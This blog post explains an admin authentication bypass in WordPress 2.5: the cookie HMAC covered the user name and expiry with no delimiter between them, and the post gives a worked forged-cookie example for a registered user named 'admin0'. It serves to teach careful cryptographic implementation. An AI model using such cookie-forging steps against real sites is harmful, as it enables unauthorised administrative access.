Admin Authentication Bypass in WordPress 2.5

Steven J. Murdoch has a great post about an admin cookie authentication bypass in WordPress 2.5. It provides an instructive look at how simple it is to improperly implement cryptographic functions.

The basic premise is that in Wordpress 2.5, an HMAC was used to provide integrity protection for the authentication cookie, but a design flaw allows specially chosen user names to create forged authentication cookies.

The auth cookie allows a user to login without any complicated session management on the server side by storing the user login, expiration time and hash value. A valid auth cookie grants a user the ability to login without any form of password. So, if a forged auth cookie could be generated such that the user login field was "admin", then that given user would have administrative privileges.

The auth cookie value is of the format:

      $user_login . '|' . $expiration . '|' . $hash

where the hash was the HMAC derived from the SECRET_KEY defined in the configuration.

The design mistake was that the HMAC was calculated over the undelimited value:

      $user_login . $expiration

Consequently, an appropriately chosen user name could be registered that would allow access to the admin account by tampering with the cookie.

In order to chose an appropriate user name, the following criteria needs to be met:

  1. User name must begin with the string "admin"
  2. The expiration must be not be in the past
  3. When the user name and password are concatenated, the original value used to calculate the HMAC must be unchanged.

Obviously, the simplest choice for a user name would be "admin0". For example, when the HMAC was initially calculated, the value:

      "admin0" . "1209590828"

would result in a cookie value of:

admin0|1209590828|7863a08bd04af260bd5df2a8bf7e8b33

Then, the cookie is modified by moving the 0 to the expiration field:

admin|01209590828|7863a08bd04af260bd5df2a8bf7e8b33

so that the HMAC is calculated over:

      "admin" . "01209590828"

Since the concatenated strings are identical, the HMAC hash is matched and the user is granted admin privileges.

A simple implementation mistake with serious consequences.

Posted by gfleischer on 2008/04/28 at 20:46 in 0wned


Subscribe
RSS 2.0
Quick Links
Content
Info

Categories
Archives
Sitemap
Valid XHTML 1.0 Transitional Valid CSS!